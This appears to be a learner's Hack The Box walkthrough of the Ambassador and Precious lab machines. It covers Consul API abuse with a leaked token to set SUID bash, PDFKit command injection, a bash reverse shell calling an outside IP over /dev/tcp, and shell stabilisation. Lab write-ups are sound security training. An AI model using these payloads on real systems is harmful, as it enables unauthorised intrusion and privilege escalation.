My first document

Daily Task Summary

Hack The Box – Ambassador

System overview

IP Address 10.129.228.56

Hostname Ambassador

Difficulty Medium

Post Exploitation

From the previous day, I found SSH credentials to log in to the machine using developer user. I found a git config file and I checked the commits and the branch that the project is on.

I can also look into the bash script myself from the directory.

It is running consul binary. From Google I can see that it is a platform to configure application across different infrastructures. This is a definition of a CI\CD pipeline much like Jenkins. I can look for the version number using this command.

consul version

I can search for known vulnerabilities in this version. Searching on Google, I can find this general remote code execution bug that I can try. According to it, If the enable_script check is enabled, it can lead to remote code execution. From this post, I can see that Metasploit has a module for it. I can also understand that consul is listening on port 8500. But I cannot access this port from outside. I can check the ports listening using this command.

ss -tulpn

It is running internally. I can query it using curl with this command.

curl http://127.0.0.1:8500/v1/agent/self

I get an access denied. From the Metasploit module, I can look at the code to understand what it does here.

I can access it using the ACL token. That is the token I found from the git commit. I can use it in the header using this command.

curl -H "X-Consul-Token: bb03b43b-1d81-d62b-24b5-

39540ee469b5" http://127.0.0.1:8500/v1/agent/self

I get a lot of data back confirming I can authenticate to the API now. For better understanding the response, I will save it to file and send it to my local machine

To get it on my local machine I can use this command.

scp developer@10.129.155.176:/tmp/res.txt .

I can then read the response using this command. cat res.txt | jq

I didn’t find anything useful. So, I can go forward with the exploit. According to the exploit, I need to construct a web request like this.

I can use this command for it.

curl -H "X-Consul-Token: bb03b43b-1d81-d62b-24b539540ee469b5" -X PUT -d '{"ID": "crypt0ace", "Name": "crypt0ace", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/tmp/tmp.sh"], "interval": "10s", "timeout": "86400s"}}'

http://127.0.0.1:8500/v1/agent/service/register

For it I can also create a temp.sh with the reverse shell to port 9001 and make it an execute able. Now when I run the command, I don’t get a shell back.

I can try after changing the script to this.

This would set the SUID bit on bash which can be leveraged with -p which will not drop the root user privileges when a normal user will access it.

I can now use the command again to see if it works.

The bash binary now has the SUID bit set and I can use it to get a root shell.

Hack The Box – Precious

System overview

IP Address 10.129.9.123

Hostname Precious

Difficulty Easy

Initial Scan

First, I can start up with nmap to map the ports that are open in this machine. I can use this command for a full network scan.

nmap -sC -sV -A -p- -vvvvv 10.129.9.123 -oN allports.nmap

Where:



-sC stands for default scripts the nmap can run against the open ports it finds to find more information and vulnerabilities for them

 -sV stands for version detection on the services running on the ports

 -A stands for the same two options plus addition of OS Detection

 -p- stands for all ports to scan

 -vvvvv stands for verbose output

 -oN stands for output the scan result in normal format on allports.nmap file

I can find the results in the allports.nmap file. According to this, there are 2 ports open.

 22 for SSH

 80 for HTTP

I can see the results here.

I can see that the webserver points to a domain precious.htb. I can add it to my hosts file at /etc/hosts.

Service Enumeration and Recon

I can also view the website on the browser.

It is taking a URL and converting it to a PDF. I can see the source code but nothing interesting.

I can test it by providing it with my IP and also running Burp Suite in the background. I can also run netcat on port 80 to get the request back and inspect its contents. Before doing that, I can run recon in the background using gobuster to find directories and files.

gobuster dir -u http://precious.htb -w /usr/share/dirbuster/wordlists/directory-list-

lowercase-2.3-medium.txt -x php,txt,html

I get an error saying the URL is invalid. I can pass the request to repeater to see the response headers as well.

I can see the backend server is running nginx and Phusion Passenger with Ruby. I can search on Google to find some known vulnerabilities but found none for this version because it was released recently in September.

I can test the website with different payloads to check if I get an error indicating some backend misconfiguration that I can exploit. But nothing works.

I tried single and double quotes to check SQL or PHP issues but nothing comes up. I also used this payload to check for SSTI.

{{7*7}}

To test the actual functionality, I can make a dummy index.html page and try to load that in the website to see the response as well

It fetches the page and downloads a PDF of it. I don’t see a directory where it gets stored so I will just download it. I also forwarded the request to repeater to see the response.

I can see the contents and the metadata of the PDF. I can also look into the metadata using exiftool.

I can see that it is using PDFKit to generate the PDFs. I can check the release date for the version number from Google.

It was from April 12th. I will be using Google to find if it is vulnerable to anything. I find this page which notes that it is vulnerable to Command Injections in versions less than 0.8.7.2. This website also shows the POC for this vulnerability. According to it, if the URLs are not properly sanitized, it can lead to code execution.

I can try this exploit with ping command to test if we have remote code execution.

http://10.10.14.207/?name=#{'%20`ping -c 1 10.10.14.207`'}

I can see a request being made but I don’t see a ping callback.

I can try changing it to 127.0.0.1 and see if I get a response back.

http://127.0.0.1/?name=#{'%20`ping -c 1 10.10.14.207`'}

I see an error on the page but I can see that it called back for ping to my local machine. This means I have blind code execution on the machine

Exploitation

I can leverage it to get a reverse shell. I can use this command for it.

http://127.0.0.1/?name=#{'%20`bash -c "/bin/bash -i >& /dev/tcp/10.10.14.207/9001 0>&1"`'}

This will give me a call back on port 9001.

I have a shell.

Post Exploitation

I can use these commands to stabilize my shell.

python3 -c "import pty;pty.spawn('/bin/bash')"

export TERM=xterm

stty raw -echo;fg

I have the user ruby. From the passwd file I can understand that there are 2 other users, henry and root

I can look into the home directory of henry but I cannot get user.txt file.

I can look into my own home directory as well. I see a .bundle directory with a config file.

I have henry’s password that I can use to log in to SSH.

I can try to use this command to see if this user can run any commands as root user. sudo

I can try to edit this file and include a reverse shell.

I can not edit this file.